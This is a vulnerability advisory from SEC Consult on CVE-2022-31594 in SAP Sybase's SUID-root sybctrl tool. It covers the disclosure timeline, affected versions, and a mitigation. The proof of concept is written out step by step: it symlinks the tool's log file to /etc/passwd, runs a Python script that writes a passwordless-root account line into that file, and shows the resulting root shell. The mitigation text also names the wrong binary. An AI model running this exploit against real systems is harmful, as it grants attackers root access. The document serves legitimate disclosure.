Local privilege escalation in SAP® Sybase sybctrl


Local privilege escalation


SAP® Sybase sybctrl

Vulnerable Version

see section "Vulnerable / tested versions"

Fixed Version

see SAP® security note 3155571

CVE Number







Mingshuo Li (Office Munich) | SEC Consult Vulnerability Lab

The SUID-root program sybctrl of SAP® Sybase erroneously follows a symbolic link to log error messages. Directing the target of the link to some credential file for controlled modification can grant the local attacker root privileges.



Vendor description

"Sybase solutions strategic for data management Combining the strength of in-memory technology with Sybase solutions, SAP® offers the most robust data platform to achieve business agility."

Source: https://www.sap.com/germany/acquired-brands/what-is-sybase.html


Business recommendation

SEC Consult recommends to implement the security note 3155571, where the documented issue is fixed according to the vendor. We advise installing the corrections as a matter of priority to keep business-critical data secure.


Vulnerability overview/description

1) Local privilege escalation (CVE-2022-31594)

The SUID-root program sybctrl by SAP® Sybase follows the symbolic link to log error messages during the execution. As member of the group sapsys, a user can therefore escalate his/her privileges to root on a local Unix system.


Proof of Concept

1) Local privilege escalation (CVE-2022-31594)

As shown below is the owner, group and its permission bits of sybctrl of a standard installation.

$ ls -l sybctrl
-rwsr-x--- 1 root sapsys 4460399 Feb 28  2019 sybctrl

A sapsys group user first creates a symbolic link pointing to the passwd file.

$ ln -s /etc/passwd dev_sybctrl
$ ls -l dev_sybctrl
lrwxrwxrwx 1 secadm sapsys 11 Feb 18 15:30 dev_sybctrl -> /etc/passwd

Then run the following python script, which outputs the error messages into the target file pointed to by the dev_sybctrl. The command line to execute includes one line of user account information surrounded by the new line, and the password hash has been pre-calculated with openssl.

$ cat sol.py
import os
# openssl passwd sappass
u1_passwd = "sapmatt:wPi023oIkjHdA:0:0::/root:/bin/bash"
os.execv("/usr/sap/SEC/SYS/exe/uc/linuxx86_64/sybctrl", ["sybctrl", "load_script", "cccc", "\x0a" + u1_passwd +  "\x0a", "-auth"])

$ python3 sol.py 
Error: executing administration task failed.

As a result, the /etc/passwd was appended with the error messages, among them the second last line grants a valid privileged account, while others are simply ignored for the purpose of the exploit.

$ tail -n 5 /etc/passwd
2022 02/18 15:30:33 == file opened ==
 DBSL patch version 400.
 Error: invalid argument: 

A login with the credential sapmatt/sappass ensues to complete the escalation.

$ su sapmatt
# id
uid=0(sapmatt) gid=0(root) groups=0(root)


Vulnerable / tested versions

The following version of the binary was found to be vulnerable during our tests:

  • version 021 (753 03/23/2018 14:04:00)

According to the vendor the following products are affected by the discovered vulnerability:

SAP® Adaptive Server Enterprise (ASE), Versions:

  • KERNEL 7.22, 7.49, 7.53
  • KRNL64NUC 7.22, 7.22EXT, 7.49
  • KRNL64UC 7.22, 7.22EXT, 7.49, 7.53

Please refer to the vendor patch day post: https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10

Vendor contact timeline

2022-02-22 Contacting vendor through vulnerability submission web form.
2022-02-24 Vendor confirms receipt and assigns SAP® security incident number #2280077785.
2022-03-30 Vendor requires an elaboration on CVSS vector.
2022-04-07 Requesting the original CVSS vector.
2022-04-22 Vendor responds to the request.
2022-04-29 Explaining the rationale behind the CVSS rating.
2022-06-14 Vendor releases patches with SAP® security note 3155571.
2022-06-15 Requesting the confirmation of the security note on the issue.
2022-08-11 Vendor sends the link to the Acknowledgements to Security Researchers.
2022-09-02 Requesting the confirmation of the fix.
2022-09-03 Vendor confirms the issue has been fixed on June Patch Day.
2022-09-16 Public release of security advisory.


The following security note needs to be implemented: https://launchpad.support.sap.com/#/notes/3155571



You can remove the SUID-bit from sapuxuserchk as temporary mitigation.

# chmod 0755 sybctrl


Advisory URL



EOF Mingshuo Li / @2022

Interested to work with the experts of SEC Consult? Send us your application

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices